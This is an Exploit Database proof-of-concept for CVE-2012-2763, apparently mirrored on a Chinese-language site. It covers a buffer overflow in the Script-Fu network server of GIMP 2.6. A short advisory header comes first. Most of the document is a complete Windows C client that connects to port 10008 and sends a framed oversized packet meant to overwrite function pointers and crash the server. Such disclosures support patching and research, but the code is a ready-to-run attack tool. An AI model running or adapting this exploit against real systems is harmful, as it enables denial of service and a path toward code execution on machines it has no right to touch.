GIMP 2.6 script-fu < 2.8.0 - Buffer Overflow (PoC)

Exploit Database
115 阅读

作者： Joseph Sheridan

日期： 2012-05-31
类别：
- dos
平台：
- windows
来源：https://www.exploit-db.com/exploits/18956/

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

155

156

157

158

159

160

161

162

163

164

165

166

167

168

# There is a buffer overflow in the script-fu server component of GIMP

# (the GNU Image Manipulation Program) in all 2.6 versions (Windows and Linux

# versions) affecting both

# the script-fu console and the script-fu network server. A crafted msg to the

# script-fu server overflows a buffer and overwrites several function pointers

# allowing the attacker to gain control of EIP and potentially execute

# arbitrary

# code. This issue is fixed in the latest, stable GIMP version (currently 2.8.0).

# CVE number: CVE-2012-2763

# Impact: high

# Vendor Homepage: http://www.gimp.org/

# Date found: 18/05/2012

# Found by: d of Reaction Information Security

# Homepage: http://www.reactionpenetrationtesting.co.uk

====

POC

====

////////////////////////////////////////////////////////////////

// //

// PoC for GIMP <= 2.6 Script-Fu server buffer overflow //

// Author: Joseph Sheridan //

// Date: 20/05/2012 //

// //

// compile with cl scriptfubof.c /link wsock32.lib//

////////////////////////////////////////////////////////////////

#define WIN32_LEAN_AND_MEAN

#include <winsock2.h>

#include <stdlib.h>

#include <stdio.h>

#include <string.h>

#define DEFAULT_PORT 10008

// TCP socket type

#define DEFAULT_PROTO SOCK_STREAM

void senddata();

void recvdata();

WSADATA wsaData;

SOCKETconn_socket;

char Buffer[2000000];

char inBuffer[128];

void Usage()

{

printf("Usage: scriptfubof servername portnumber\n");

fflush(stdout);

exit(1);

}

int main(int argc, char *argv[])

{

// default to localhost

char *server_name= "localhost";

unsigned short port = DEFAULT_PORT;

int i, loopcount, maxloop=-1;

int retval;

unsigned int addr;

int socket_type = DEFAULT_PROTO;

struct sockaddr_in server;

if (argc < 3) {

Usage();

}

if ((retval = WSAStartup(0x202, &wsaData)) != 0)

{

fprintf(stderr,"WSAStartup() failed with error %d\n", retval);

WSACleanup();

return -1;

}

// Get portnum

port = atoi(argv[2]);

memset(&server, 0, sizeof(server));

server.sin_addr.s_addr = inet_addr(argv[1]);

server.sin_family = AF_INET;

server.sin_port = htons(port);

conn_socket = socket(AF_INET, socket_type, 0); /* Open a socket */

if (conn_socket <0 )

{

fprintf(stderr,"Client: Error Opening socket: Error %d\n", WSAGetLastError());

WSACleanup();

return -1;

}

if (connect(conn_socket, (struct sockaddr*)&server, sizeof(server)) == SOCKET_ERROR)

{

fprintf(stderr,"Client: connect() failed: %d\n", WSAGetLastError());

WSACleanup();

return -1;

}

// Send the data

senddata();

// recieve a msg

recvdata();

closesocket(conn_socket);

WSACleanup();

return 0;

}

void senddata() {

int loopcount = 0, retval =0;

unsigned char command[]="aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa";

Buffer[0]='\x47'; //Magic byte 'G'

Buffer[1]=sizeof(command)/256; //High byte of L - L div 256

Buffer[2]=sizeof(command)%256; //Low byte of L - L mod 256

strcpy(&Buffer[3],command);

retval = send(conn_socket, Buffer, sizeof(command) +3, 0);

if (retval == SOCKET_ERROR)

{

fprintf(stderr,"Client: send() failed: error %d.\n", WSAGetLastError());

WSACleanup();

return;

}

else

printf("Client: send() is OK.\n");

printf("Client: Sent data \"%s\"\n", Buffer);

}

void recvdata() {

int i=0;

int retval=0;

memset(inBuffer,0,128);

retval = recv(conn_socket, inBuffer, 128, 0);

printf("retval is :%d\n", retval);

printf("first char is: %x\n", inBuffer[0]);

if (retval == SOCKET_ERROR)

{

fprintf(stderr,"Client: recv() failed: error %d.\n", WSAGetLastError());

closesocket(conn_socket);

WSACleanup();

return;

}

else {

printf("Client: recv() is OK.\n");

// print the message contents...

for (i=0;i<retval;i++) {

printf("%c", inBuffer[i]);

}

printf("\n");

fflush(stdout);

}